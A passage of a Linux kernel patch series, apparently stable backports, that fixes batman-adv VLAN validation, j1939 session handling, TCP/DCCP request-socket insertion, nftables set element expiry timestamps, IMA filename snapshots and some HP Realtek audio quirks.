++	unsigned short non_vlan = vid & ~(BATADV_VLAN_HAS_TAG | VLAN_VID_MASK);
++
++	if (vid == 0)
++		return true;
++
++	if (!(vid & BATADV_VLAN_HAS_TAG))
++		return false;
++
++	if (non_vlan)
++		return false;
++
++	return true;
++}
++
+ /**
+  * batadv_orig_node_vlan_new() - search and possibly create an orig_node_vlan
+  *  object
+@@ -149,6 +173,9 @@ batadv_orig_node_vlan_new(struct batadv_orig_node *orig_node,
+ {
+ 	struct batadv_orig_node_vlan *vlan;
+ 
++	if (!batadv_vlan_id_valid(vid))
++		return NULL;
++
+ 	spin_lock_bh(&orig_node->vlan_list_lock);
+ 
+ 	/* first look if an object for this vid already exists */
+diff --git a/net/can/j1939/main.c b/net/can/j1939/main.c
+index a6fb89fa62785..7e8a20f2fc42b 100644
+--- a/net/can/j1939/main.c
++++ b/net/can/j1939/main.c
+@@ -30,10 +30,6 @@ MODULE_ALIAS("can-proto-" __stringify(CAN_J1939));
+ /* CAN_HDR: #bytes before can_frame data part */
+ #define J1939_CAN_HDR (offsetof(struct can_frame, data))
+ 
+-/* CAN_FTR: #bytes beyond data part */
+-#define J1939_CAN_FTR (sizeof(struct can_frame) - J1939_CAN_HDR - \
+-		 sizeof(((struct can_frame *)0)->data))
+-
+ /* lowest layer */
+ static void j1939_can_recv(struct sk_buff *iskb, void *data)
+ {
+@@ -342,7 +338,7 @@ int j1939_send_one(struct j1939_priv *priv, struct sk_buff *skb)
+ 	memset(cf, 0, J1939_CAN_HDR);
+ 
+ 	/* make it a full can frame again */
+-	skb_put(skb, J1939_CAN_FTR + (8 - dlc));
++	skb_put_zero(skb, 8 - dlc);
+ 
+ 	canid = CAN_EFF_FLAG |
+ 		(skcb->priority << 26) |
+diff --git a/net/can/j1939/transport.c b/net/can/j1939/transport.c
+index bd8ec24338324..25e7339834670 100644
+--- a/net/can/j1939/transport.c
++++ b/net/can/j1939/transport.c
+@@ -1593,8 +1593,8 @@ j1939_session *j1939_xtp_rx_rts_session_new(struct j1939_priv *priv,
+ 	struct j1939_sk_buff_cb skcb = *j1939_skb_to_cb(skb);
+ 	struct j1939_session *session;
+ 	const u8 *dat;
++	int len, ret;
+ 	pgn_t pgn;
+-	int len;
+ 
+ 	netdev_dbg(priv->ndev, "%s\n", __func__);
+ 
+@@ -1653,7 +1653,22 @@ j1939_session *j1939_xtp_rx_rts_session_new(struct j1939_priv *priv,
+ 	session->tskey = priv->rx_tskey++;
+ 	j1939_sk_errqueue(session, J1939_ERRQUEUE_RX_RTS);
+ 
+-	WARN_ON_ONCE(j1939_session_activate(session));
++	ret = j1939_session_activate(session);
++	if (ret) {
++		/* Entering this scope indicates an issue with the J1939 bus.
++		 * Possible scenarios include:
++		 * - A time lapse occurred, and a new session was initiated
++		 *   due to another packet being sent correctly. This could
++		 *   have been caused by too long interrupt, debugger, or being
++		 *   out-scheduled by another task.
++		 * - The bus is receiving numerous erroneous packets, either
++		 *   from a malfunctioning device or during a test scenario.
++		 */
++		netdev_alert(priv->ndev, "%s: 0x%p: concurrent session with same addr (%02x %02x) is already active.\n",
++			     __func__, session, skcb.addr.sa, skcb.addr.da);
++		j1939_session_put(session);
++		return NULL;
++	}
+ 
+ 	return session;
+ }
+@@ -1681,6 +1696,8 @@ static int j1939_xtp_rx_rts_session_active(struct j1939_session *session,
+ 
+ 		j1939_session_timers_cancel(session);
+ 		j1939_session_cancel(session, J1939_XTP_ABORT_BUSY);
++		if (session->transmission)
++			j1939_session_deactivate_activate_next(session);
+ 
+ 		return -EBUSY;
+ 	}
+diff --git a/net/core/filter.c b/net/core/filter.c
+index 7a07413913538..dc89c34247187 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -82,6 +82,9 @@
+ #include <net/mptcp.h>
+ #include <net/netfilter/nf_conntrack_bpf.h>
+ 
++/* Keep the struct bpf_fib_lookup small so that it fits into a cacheline */
++static_assert(sizeof(struct bpf_fib_lookup) == 64, "struct bpf_fib_lookup size check");
++
+ static const struct bpf_func_proto *
+ bpf_sk_base_func_proto(enum bpf_func_id func_id);
+ 
+diff --git a/net/core/xdp.c b/net/core/xdp.c
+index 844c9d99dc0ec..c3f6653b42742 100644
+--- a/net/core/xdp.c
++++ b/net/core/xdp.c
+@@ -292,10 +292,8 @@ static struct xdp_mem_allocator *__xdp_reg_mem_model(struct xdp_mem_info *mem,
+ 		mutex_lock(&mem_id_lock);
+ 		ret = __mem_id_init_hash_table();
+ 		mutex_unlock(&mem_id_lock);
+-		if (ret < 0) {
+-			WARN_ON(1);
++		if (ret < 0)
+ 			return ERR_PTR(ret);
+-		}
+ 	}
+ 
+ 	xdp_alloc = kzalloc(sizeof(*xdp_alloc), gfp);
+diff --git a/net/dccp/ipv4.c b/net/dccp/ipv4.c
+index 9fe6d96797169..f4a2dce3e1048 100644
+--- a/net/dccp/ipv4.c
++++ b/net/dccp/ipv4.c
+@@ -654,8 +654,11 @@ int dccp_v4_conn_request(struct sock *sk, struct sk_buff *skb)
+ 	if (dccp_v4_send_response(sk, req))
+ 		goto drop_and_free;
+ 
+-	inet_csk_reqsk_queue_hash_add(sk, req, DCCP_TIMEOUT_INIT);
+-	reqsk_put(req);
++	if (unlikely(!inet_csk_reqsk_queue_hash_add(sk, req, DCCP_TIMEOUT_INIT)))
++		reqsk_free(req);
++	else
++		reqsk_put(req);
++
+ 	return 0;
+ 
+ drop_and_free:
+diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
+index e0b0bf75a46c2..016af0301366d 100644
+--- a/net/dccp/ipv6.c
++++ b/net/dccp/ipv6.c
+@@ -397,8 +397,11 @@ static int dccp_v6_conn_request(struct sock *sk, struct sk_buff *skb)
+ 	if (dccp_v6_send_response(sk, req))
+ 		goto drop_and_free;
+ 
+-	inet_csk_reqsk_queue_hash_add(sk, req, DCCP_TIMEOUT_INIT);
+-	reqsk_put(req);
++	if (unlikely(!inet_csk_reqsk_queue_hash_add(sk, req, DCCP_TIMEOUT_INIT)))
++		reqsk_free(req);
++	else
++		reqsk_put(req);
++
+ 	return 0;
+ 
+ drop_and_free:
+diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
+index 8407098a59391..c267c5e066e94 100644
+--- a/net/ipv4/inet_connection_sock.c
++++ b/net/ipv4/inet_connection_sock.c
+@@ -1113,25 +1113,34 @@ static void reqsk_timer_handler(struct timer_list *t)
+ 	inet_csk_reqsk_queue_drop_and_put(oreq->rsk_listener, oreq);
+ }
+ 
+-static void reqsk_queue_hash_req(struct request_sock *req,
++static bool reqsk_queue_hash_req(struct request_sock *req,
+ 				 unsigned long timeout)
+ {
++	bool found_dup_sk = false;
++
++	if (!inet_ehash_insert(req_to_sk(req), NULL, &found_dup_sk))
++		return false;
++
++	/* The timer needs to be setup after a successful insertion. */
+ 	timer_setup(&req->rsk_timer, reqsk_timer_handler, TIMER_PINNED);
+ 	mod_timer(&req->rsk_timer, jiffies + timeout);
+ 
+-	inet_ehash_insert(req_to_sk(req), NULL, NULL);
+ 	/* before letting lookups find us, make sure all req fields
+ 	 * are committed to memory and refcnt initialized.
+ 	 */
+ 	smp_wmb();
+ 	refcount_set(&req->rsk_refcnt, 2 + 1);
++	return true;
+ }
+ 
+-void inet_csk_reqsk_queue_hash_add(struct sock *sk, struct request_sock *req,
++bool inet_csk_reqsk_queue_hash_add(struct sock *sk, struct request_sock *req,
+ 				   unsigned long timeout)
+ {
+-	reqsk_queue_hash_req(req, timeout);
++	if (!reqsk_queue_hash_req(req, timeout))
++		return false;
++
+ 	inet_csk_reqsk_queue_added(sk);
++	return true;
+ }
+ EXPORT_SYMBOL_GPL(inet_csk_reqsk_queue_hash_add);
+ 
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index d85dd394d5b44..2146299016eda 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -2754,13 +2754,37 @@ static void tcp_mtup_probe_success(struct sock *sk)
+ 	NET_INC_STATS(sock_net(sk), LINUX_MIB_TCPMTUPSUCCESS);
+ }
+ 
++/* Sometimes we deduce that packets have been dropped due to reasons other than
++ * congestion, like path MTU reductions or failed client TFO attempts. In these
++ * cases we call this function to retransmit as many packets as cwnd allows,
++ * without reducing cwnd. Given that retransmits will set retrans_stamp to a
++ * non-zero value (and may do so in a later calling context due to TSQ), we
++ * also enter CA_Loss so that we track when all retransmitted packets are ACKed
++ * and clear retrans_stamp when that happens (to ensure later recurring RTOs
++ * are using the correct retrans_stamp and don't declare ETIMEDOUT
++ * prematurely).
++ */
++static void tcp_non_congestion_loss_retransmit(struct sock *sk)
++{
++	const struct inet_connection_sock *icsk = inet_csk(sk);
++	struct tcp_sock *tp = tcp_sk(sk);
++
++	if (icsk->icsk_ca_state != TCP_CA_Loss) {
++		tp->high_seq = tp->snd_nxt;
++		tp->snd_ssthresh = tcp_current_ssthresh(sk);
++		tp->prior_ssthresh = 0;
++		tp->undo_marker = 0;
++		tcp_set_ca_state(sk, TCP_CA_Loss);
++	}
++	tcp_xmit_retransmit_queue(sk);
++}
++
+ /* Do a simple retransmit without using the backoff mechanisms in
+  * tcp_timer. This is used for path mtu discovery.
+  * The socket is already locked here.
+  */
+ void tcp_simple_retransmit(struct sock *sk)
+ {
+-	const struct inet_connection_sock *icsk = inet_csk(sk);
+ 	struct tcp_sock *tp = tcp_sk(sk);
+ 	struct sk_buff *skb;
+ 	int mss;
+@@ -2800,14 +2824,7 @@ void tcp_simple_retransmit(struct sock *sk)
+ 	 * in network, but units changed and effective
+ 	 * cwnd/ssthresh really reduced now.
+ 	 */
+-	if (icsk->icsk_ca_state != TCP_CA_Loss) {
+-		tp->high_seq = tp->snd_nxt;
+-		tp->snd_ssthresh = tcp_current_ssthresh(sk);
+-		tp->prior_ssthresh = 0;
+-		tp->undo_marker = 0;
+-		tcp_set_ca_state(sk, TCP_CA_Loss);
+-	}
+-	tcp_xmit_retransmit_queue(sk);
++	tcp_non_congestion_loss_retransmit(sk);
+ }
+ EXPORT_SYMBOL(tcp_simple_retransmit);
+ 
+@@ -6145,8 +6162,7 @@ static bool tcp_rcv_fastopen_synack(struct sock *sk, struct sk_buff *synack,
+ 			tp->fastopen_client_fail = TFO_DATA_NOT_ACKED;
+ 		skb_rbtree_walk_from(data)
+ 			 tcp_mark_skb_lost(sk, data);
+-		tcp_xmit_retransmit_queue(sk);
+-		tp->retrans_stamp = 0;
++		tcp_non_congestion_loss_retransmit(sk);
+ 		NET_INC_STATS(sock_net(sk),
+ 				LINUX_MIB_TCPFASTOPENACTIVEFAIL);
+ 		return true;
+@@ -7053,7 +7069,12 @@ int tcp_conn_request(struct request_sock_ops *rsk_ops,
+ 		tcp_rsk(req)->tfo_listener = false;
+ 		if (!want_cookie) {
+ 			req->timeout = tcp_timeout_init((struct sock *)req);
+-			inet_csk_reqsk_queue_hash_add(sk, req, req->timeout);
++			if (unlikely(!inet_csk_reqsk_queue_hash_add(sk, req,
++								    req->timeout))) {
++				reqsk_free(req);
++				return 0;
++			}
++
+ 		}
+ 		af_ops->send_synack(sk, dst, &fl, req, &foc,
+ 				    !want_cookie ? TCP_SYNACK_NORMAL :
+diff --git a/net/iucv/iucv.c b/net/iucv/iucv.c
+index f66b5f74cd83a..db41eb2d977f2 100644
+--- a/net/iucv/iucv.c
++++ b/net/iucv/iucv.c
+@@ -519,7 +519,7 @@ static void iucv_setmask_mp(void)
+  */
+ static void iucv_setmask_up(void)
+ {
+-	cpumask_t cpumask;
++	static cpumask_t cpumask;
+ 	int cpu;
+ 
+ 	/* Disable all cpu but the first in cpu_irq_cpumask. */
+@@ -627,23 +627,33 @@ static int iucv_cpu_online(unsigned int cpu)
+ 
+ static int iucv_cpu_down_prep(unsigned int cpu)
+ {
+-	cpumask_t cpumask;
++	cpumask_var_t cpumask;
++	int ret = 0;
+ 
+ 	if (!iucv_path_table)
+ 		return 0;
+ 
+-	cpumask_copy(&cpumask, &iucv_buffer_cpumask);
+-	cpumask_clear_cpu(cpu, &cpumask);
+-	if (cpumask_empty(&cpumask))
++	if (!alloc_cpumask_var(&cpumask, GFP_KERNEL))
++		return -ENOMEM;
++
++	cpumask_copy(cpumask, &iucv_buffer_cpumask);
++	cpumask_clear_cpu(cpu, cpumask);
++	if (cpumask_empty(cpumask)) {
+ 		/* Can't offline last IUCV enabled cpu. */
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto __free_cpumask;
++	}
+ 
+ 	iucv_retrieve_cpu(NULL);
+ 	if (!cpumask_empty(&iucv_irq_cpumask))
+-		return 0;
++		goto __free_cpumask;
++
+ 	smp_call_function_single(cpumask_first(&iucv_buffer_cpumask),
+ 				 iucv_allow_cpu, NULL, 1);
+-	return 0;
++
++__free_cpumask:
++	free_cpumask_var(cpumask);
++	return ret;
+ }
+ 
+ /**
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 1c4b7a8ec2cc6..97ea72d31bd35 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -5398,8 +5398,7 @@ static int nf_tables_fill_setelem(struct sk_buff *skb,
+ 
+ 	if (nft_set_ext_exists(ext, NFT_SET_EXT_DATA) &&
+ 	    nft_data_dump(skb, NFTA_SET_ELEM_DATA, nft_set_ext_data(ext),
+-			  set->dtype == NFT_DATA_VERDICT ? NFT_DATA_VERDICT : NFT_DATA_VALUE,
+-			  set->dlen) < 0)
++			  nft_set_datatype(set), set->dlen) < 0)
+ 		goto nla_put_failure;
+ 
+ 	if (nft_set_ext_exists(ext, NFT_SET_EXT_EXPRESSIONS) &&
+@@ -9377,6 +9376,7 @@ struct nft_trans_gc *nft_trans_gc_catchall_async(struct nft_trans_gc *gc,
+ struct nft_trans_gc *nft_trans_gc_catchall_sync(struct nft_trans_gc *gc)
+ {
+ 	struct nft_set_elem_catchall *catchall, *next;
++	u64 tstamp = nft_net_tstamp(gc->net);
+ 	const struct nft_set *set = gc->set;
+ 	struct nft_set_elem elem;
+ 	struct nft_set_ext *ext;
+@@ -9386,7 +9386,7 @@ struct nft_trans_gc *nft_trans_gc_catchall_sync(struct nft_trans_gc *gc)
+ 	list_for_each_entry_safe(catchall, next, &set->catchall_list, list) {
+ 		ext = nft_set_elem_ext(set, catchall->elem);
+ 
+-		if (!nft_set_elem_expired(ext))
++		if (!__nft_set_elem_expired(ext, tstamp))
+ 			continue;
+ 
+ 		gc = nft_trans_gc_queue_sync(gc, GFP_KERNEL);
+@@ -10138,6 +10138,7 @@ static bool nf_tables_valid_genid(struct net *net, u32 genid)
+ 	bool genid_ok;
+ 
+ 	mutex_lock(&nft_net->commit_mutex);
++	nft_net->tstamp = get_jiffies_64();
+ 
+ 	genid_ok = genid == 0 || nft_net->base_seq == genid;
+ 	if (!genid_ok)
+@@ -10446,6 +10447,9 @@ static int nft_validate_register_store(const struct nft_ctx *ctx,
+ 
+ 		return 0;
+ 	default:
++		if (type != NFT_DATA_VALUE)
++			return -EINVAL;
++
+ 		if (reg < NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE)
+ 			return -EINVAL;
+ 		if (len == 0)
+@@ -10454,8 +10458,6 @@ static int nft_validate_register_store(const struct nft_ctx *ctx,
+ 		    sizeof_field(struct nft_regs, data))
+ 			return -ERANGE;
+ 
+-		if (data != NULL && type != NFT_DATA_VALUE)
+-			return -EINVAL;
+ 		return 0;
+ 	}
+ }
+diff --git a/net/netfilter/nft_lookup.c b/net/netfilter/nft_lookup.c
+index 68a5dea805480..33daee2e54c5c 100644
+--- a/net/netfilter/nft_lookup.c
++++ b/net/netfilter/nft_lookup.c
+@@ -136,7 +136,8 @@ static int nft_lookup_init(const struct nft_ctx *ctx,
+ 			return -EINVAL;
+ 
+ 		err = nft_parse_register_store(ctx, tb[NFTA_LOOKUP_DREG],
+-					       &priv->dreg, NULL, set->dtype,
++					       &priv->dreg, NULL,
++					       nft_set_datatype(set),
+ 					       set->dlen);
+ 		if (err < 0)
+ 			return err;
+diff --git a/net/netfilter/nft_set_hash.c b/net/netfilter/nft_set_hash.c
+index 2013de934cef0..1fd3b413350dc 100644
+--- a/net/netfilter/nft_set_hash.c
++++ b/net/netfilter/nft_set_hash.c
+@@ -35,6 +35,7 @@ struct nft_rhash_cmp_arg {
+ 	const struct nft_set		*set;
+ 	const u32			*key;
+ 	u8				genmask;
++	u64				tstamp;
+ };
+ 
+ static inline u32 nft_rhash_key(const void *data, u32 len, u32 seed)
+@@ -61,7 +62,7 @@ static inline int nft_rhash_cmp(struct rhashtable_compare_arg *arg,
+ 		return 1;
+ 	if (nft_set_elem_is_dead(&he->ext))
+ 		return 1;
+-	if (nft_set_elem_expired(&he->ext))
++	if (__nft_set_elem_expired(&he->ext, x->tstamp))
+ 		return 1;
+ 	if (!nft_set_elem_active(&he->ext, x->genmask))
+ 		return 1;
+@@ -86,6 +87,7 @@ bool nft_rhash_lookup(const struct net *net, const struct nft_set *set,
+ 		.genmask = nft_genmask_cur(net),
+ 		.set	 = set,
+ 		.key	 = key,
++		.tstamp  = get_jiffies_64(),
+ 	};
+ 
+ 	he = rhashtable_lookup(&priv->ht, &arg, nft_rhash_params);
+@@ -104,6 +106,7 @@ static void *nft_rhash_get(const struct net *net, const struct nft_set *set,
+ 		.genmask = nft_genmask_cur(net),
+ 		.set	 = set,
+ 		.key	 = elem->key.val.data,
++		.tstamp  = get_jiffies_64(),
+ 	};
+ 
+ 	he = rhashtable_lookup(&priv->ht, &arg, nft_rhash_params);
+@@ -127,6 +130,7 @@ static bool nft_rhash_update(struct nft_set *set, const u32 *key,
+ 		.genmask = NFT_GENMASK_ANY,
+ 		.set	 = set,
+ 		.key	 = key,
++		.tstamp  = get_jiffies_64(),
+ 	};
+ 
+ 	he = rhashtable_lookup(&priv->ht, &arg, nft_rhash_params);
+@@ -170,6 +174,7 @@ static int nft_rhash_insert(const struct net *net, const struct nft_set *set,
+ 		.genmask = nft_genmask_next(net),
+ 		.set	 = set,
+ 		.key	 = elem->key.val.data,
++		.tstamp	 = nft_net_tstamp(net),
+ 	};
+ 	struct nft_rhash_elem *prev;
+ 
+@@ -212,6 +217,7 @@ static void *nft_rhash_deactivate(const struct net *net,
+ 		.genmask = nft_genmask_next(net),
+ 		.set	 = set,
+ 		.key	 = elem->key.val.data,
++		.tstamp	 = nft_net_tstamp(net),
+ 	};
+ 
+ 	rcu_read_lock();
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index 2299ced939c47..a56ed216c2233 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -504,6 +504,7 @@ bool nft_pipapo_lookup(const struct net *net, const struct nft_set *set,
+  * @set:	nftables API set representation
+  * @data:	Key data to be matched against existing elements
+  * @genmask:	If set, check that element is active in given genmask
++ * @tstamp:	timestamp to check for expired elements
+  *
+  * This is essentially the same as the lookup function, except that it matches
+  * key data against the uncommitted copy and doesn't use preallocated maps for
+@@ -513,7 +514,8 @@ bool nft_pipapo_lookup(const struct net *net, const struct nft_set *set,
+  */
+ static struct nft_pipapo_elem *pipapo_get(const struct net *net,
+ 					  const struct nft_set *set,
+-					  const u8 *data, u8 genmask)
++					  const u8 *data, u8 genmask,
++					  u64 tstamp)
+ {
+ 	struct nft_pipapo_elem *ret = ERR_PTR(-ENOENT);
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+@@ -566,7 +568,7 @@ static struct nft_pipapo_elem *pipapo_get(const struct net *net,
+ 			goto out;
+ 
+ 		if (last) {
+-			if (nft_set_elem_expired(&f->mt[b].e->ext))
++			if (__nft_set_elem_expired(&f->mt[b].e->ext, tstamp))
+ 				goto next_match;
+ 			if ((genmask &&
+ 			     !nft_set_elem_active(&f->mt[b].e->ext, genmask)))
+@@ -603,7 +605,7 @@ static void *nft_pipapo_get(const struct net *net, const struct nft_set *set,
+ 			    const struct nft_set_elem *elem, unsigned int flags)
+ {
+ 	return pipapo_get(net, set, (const u8 *)elem->key.val.data,
+-			 nft_genmask_cur(net));
++			 nft_genmask_cur(net), get_jiffies_64());
+ }
+ 
+ /**
+@@ -1197,6 +1199,7 @@ static int nft_pipapo_insert(const struct net *net, const struct nft_set *set,
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+ 	struct nft_pipapo_match *m = priv->clone;
+ 	u8 genmask = nft_genmask_next(net);
++	u64 tstamp = nft_net_tstamp(net);
+ 	struct nft_pipapo_field *f;
+ 	const u8 *start_p, *end_p;
+ 	int i, bsize_max, err = 0;
+@@ -1206,7 +1209,7 @@ static int nft_pipapo_insert(const struct net *net, const struct nft_set *set,
+ 	else
+ 		end = start;
+ 
+-	dup = pipapo_get(net, set, start, genmask);
++	dup = pipapo_get(net, set, start, genmask, tstamp);
+ 	if (!IS_ERR(dup)) {
+ 		/* Check if we already have the same exact entry */
+ 		const struct nft_data *dup_key, *dup_end;
+@@ -1228,7 +1231,7 @@ static int nft_pipapo_insert(const struct net *net, const struct nft_set *set,
+ 
+ 	if (PTR_ERR(dup) == -ENOENT) {
+ 		/* Look for partially overlapping entries */
+-		dup = pipapo_get(net, set, end, nft_genmask_next(net));
++		dup = pipapo_get(net, set, end, nft_genmask_next(net), tstamp);
+ 	}
+ 
+ 	if (PTR_ERR(dup) != -ENOENT) {
+@@ -1581,6 +1584,7 @@ static void pipapo_gc(const struct nft_set *_set, struct nft_pipapo_match *m)
+ 	struct nft_set *set = (struct nft_set *) _set;
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+ 	struct net *net = read_pnet(&set->net);
++	u64 tstamp = nft_net_tstamp(net);
+ 	int rules_f0, first_rule = 0;
+ 	struct nft_pipapo_elem *e;
+ 	struct nft_trans_gc *gc;
+@@ -1615,7 +1619,7 @@ static void pipapo_gc(const struct nft_set *_set, struct nft_pipapo_match *m)
+ 		/* synchronous gc never fails, there is no need to set on
+ 		 * NFT_SET_ELEM_DEAD_BIT.
+ 		 */
+-		if (nft_set_elem_expired(&e->ext)) {
++		if (__nft_set_elem_expired(&e->ext, tstamp)) {
+ 			priv->dirty = true;
+ 
+ 			gc = nft_trans_gc_queue_sync(gc, GFP_ATOMIC);
+@@ -1786,7 +1790,7 @@ static void *pipapo_deactivate(const struct net *net, const struct nft_set *set,
+ {
+ 	struct nft_pipapo_elem *e;
+ 
+-	e = pipapo_get(net, set, data, nft_genmask_next(net));
++	e = pipapo_get(net, set, data, nft_genmask_next(net), nft_net_tstamp(net));
+ 	if (IS_ERR(e))
+ 		return NULL;
+ 
+diff --git a/net/netfilter/nft_set_rbtree.c b/net/netfilter/nft_set_rbtree.c
+index 5bf5572e945cc..021d9e76129a5 100644
+--- a/net/netfilter/nft_set_rbtree.c
++++ b/net/netfilter/nft_set_rbtree.c
+@@ -314,6 +314,7 @@ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 	struct nft_rbtree *priv = nft_set_priv(set);
+ 	u8 cur_genmask = nft_genmask_cur(net);
+ 	u8 genmask = nft_genmask_next(net);
++	u64 tstamp = nft_net_tstamp(net);
+ 	int d;
+ 
+ 	/* Descend the tree to search for an existing element greater than the
+@@ -361,7 +362,7 @@ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 		/* perform garbage collection to avoid bogus overlap reports
+ 		 * but skip new elements in this transaction.
+ 		 */
+-		if (nft_set_elem_expired(&rbe->ext) &&
++		if (__nft_set_elem_expired(&rbe->ext, tstamp) &&
+ 		    nft_set_elem_active(&rbe->ext, cur_genmask)) {
+ 			const struct nft_rbtree_elem *removed_end;
+ 
+@@ -548,6 +549,7 @@ static void *nft_rbtree_deactivate(const struct net *net,
+ 	const struct rb_node *parent = priv->root.rb_node;
+ 	struct nft_rbtree_elem *rbe, *this = elem->priv;
+ 	u8 genmask = nft_genmask_next(net);
++	u64 tstamp = nft_net_tstamp(net);
+ 	int d;
+ 
+ 	while (parent != NULL) {
+@@ -568,7 +570,7 @@ static void *nft_rbtree_deactivate(const struct net *net,
+ 				   nft_rbtree_interval_end(this)) {
+ 				parent = parent->rb_right;
+ 				continue;
+-			} else if (nft_set_elem_expired(&rbe->ext)) {
++			} else if (__nft_set_elem_expired(&rbe->ext, tstamp)) {
+ 				break;
+ 			} else if (!nft_set_elem_active(&rbe->ext, genmask)) {
+ 				parent = parent->rb_left;
+diff --git a/scripts/Makefile.dtbinst b/scripts/Makefile.dtbinst
+index 190d781e84f4b..3668259ddb65d 100644
+--- a/scripts/Makefile.dtbinst
++++ b/scripts/Makefile.dtbinst
+@@ -24,7 +24,7 @@ __dtbs_install: $(dtbs) $(subdirs)
+ 	@:
+ 
+ quiet_cmd_dtb_install = INSTALL $@
+-      cmd_dtb_install = install -D $< $@
++      cmd_dtb_install = install -D -m 0644 $< $@
+ 
+ $(dst)/%.dtb: $(obj)/%.dtb
+ 	$(call cmd,dtb_install)
+diff --git a/security/integrity/ima/ima_api.c b/security/integrity/ima/ima_api.c
+index 026c8c9db9920..fed2b0b6b9ec4 100644
+--- a/security/integrity/ima/ima_api.c
++++ b/security/integrity/ima/ima_api.c
+@@ -244,8 +244,8 @@ int ima_collect_measurement(struct integrity_iint_cache *iint,
+ 	const char *audit_cause = "failed";
+ 	struct inode *inode = file_inode(file);
+ 	struct inode *real_inode = d_real_inode(file_dentry(file));
+-	const char *filename = file->f_path.dentry->d_name.name;
+ 	struct ima_max_digest_data hash;
++	struct name_snapshot filename;
+ 	int result = 0;
+ 	int length;
+ 	void *tmpbuf;
+@@ -319,9 +319,13 @@ int ima_collect_measurement(struct integrity_iint_cache *iint,
+ 		if (file->f_flags & O_DIRECT)
+ 			audit_cause = "failed(directio)";
+ 
++		take_dentry_name_snapshot(&filename, file->f_path.dentry);
++
+ 		integrity_audit_msg(AUDIT_INTEGRITY_DATA, inode,
+-				    filename, "collect_data", audit_cause,
+-				    result, 0);
++				    filename.name.name, "collect_data",
++				    audit_cause, result, 0);
++
++		release_dentry_name_snapshot(&filename);
+ 	}
+ 	return result;
+ }
+@@ -434,6 +438,7 @@ void ima_audit_measurement(struct integrity_iint_cache *iint,
+  */
+ const char *ima_d_path(const struct path *path, char **pathbuf, char *namebuf)
+ {
++	struct name_snapshot filename;
+ 	char *pathname = NULL;
+ 
+ 	*pathbuf = __getname();
+@@ -447,7 +452,10 @@ const char *ima_d_path(const struct path *path, char **pathbuf, char *namebuf)
+ 	}
+ 
+ 	if (!pathname) {
+-		strscpy(namebuf, path->dentry->d_name.name, NAME_MAX);
++		take_dentry_name_snapshot(&filename, path->dentry);
++		strscpy(namebuf, filename.name.name, NAME_MAX);
++		release_dentry_name_snapshot(&filename);
++
+ 		pathname = namebuf;
+ 	}
+ 
+diff --git a/security/integrity/ima/ima_template_lib.c b/security/integrity/ima/ima_template_lib.c
+index 7bf9b15072202..41ec31debe870 100644
+--- a/security/integrity/ima/ima_template_lib.c
++++ b/security/integrity/ima/ima_template_lib.c
+@@ -483,7 +483,10 @@ static int ima_eventname_init_common(struct ima_event_data *event_data,
+ 				     bool size_limit)
+ {
+ 	const char *cur_filename = NULL;
++	struct name_snapshot filename;
+ 	u32 cur_filename_len = 0;
++	bool snapshot = false;
++	int ret;
+ 
+ 	BUG_ON(event_data->filename == NULL && event_data->file == NULL);
+ 
+@@ -496,7 +499,10 @@ static int ima_eventname_init_common(struct ima_event_data *event_data,
+ 	}
+ 
+ 	if (event_data->file) {
+-		cur_filename = event_data->file->f_path.dentry->d_name.name;
++		take_dentry_name_snapshot(&filename,
++					  event_data->file->f_path.dentry);
++		snapshot = true;
++		cur_filename = filename.name.name;
+ 		cur_filename_len = strlen(cur_filename);
+ 	} else
+ 		/*
+@@ -505,8 +511,13 @@ static int ima_eventname_init_common(struct ima_event_data *event_data,
+ 		 */
+ 		cur_filename_len = IMA_EVENT_NAME_LEN_MAX;
+ out:
+-	return ima_write_template_field_data(cur_filename, cur_filename_len,
+-					     DATA_FMT_STRING, field_data);
++	ret = ima_write_template_field_data(cur_filename, cur_filename_len,
++					    DATA_FMT_STRING, field_data);
++
++	if (snapshot)
++		release_dentry_name_snapshot(&filename);
++
++	return ret;
+ }
+ 
+ /*
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 60866e8e1d961..11ec5783a2f17 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9807,6 +9807,9 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8c7c, "HP ProBook 445 G11", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8c7d, "HP ProBook 465 G11", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8c7e, "HP ProBook 465 G11", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8c7f, "HP EliteBook 645 G11", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8c80, "HP EliteBook 645 G11", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8c81, "HP EliteBook 665 G11", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8c89, "HP ProBook 460 G11", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c8a, "HP EliteBook 630", ALC236_FIXUP_HP_GPIO_LED),
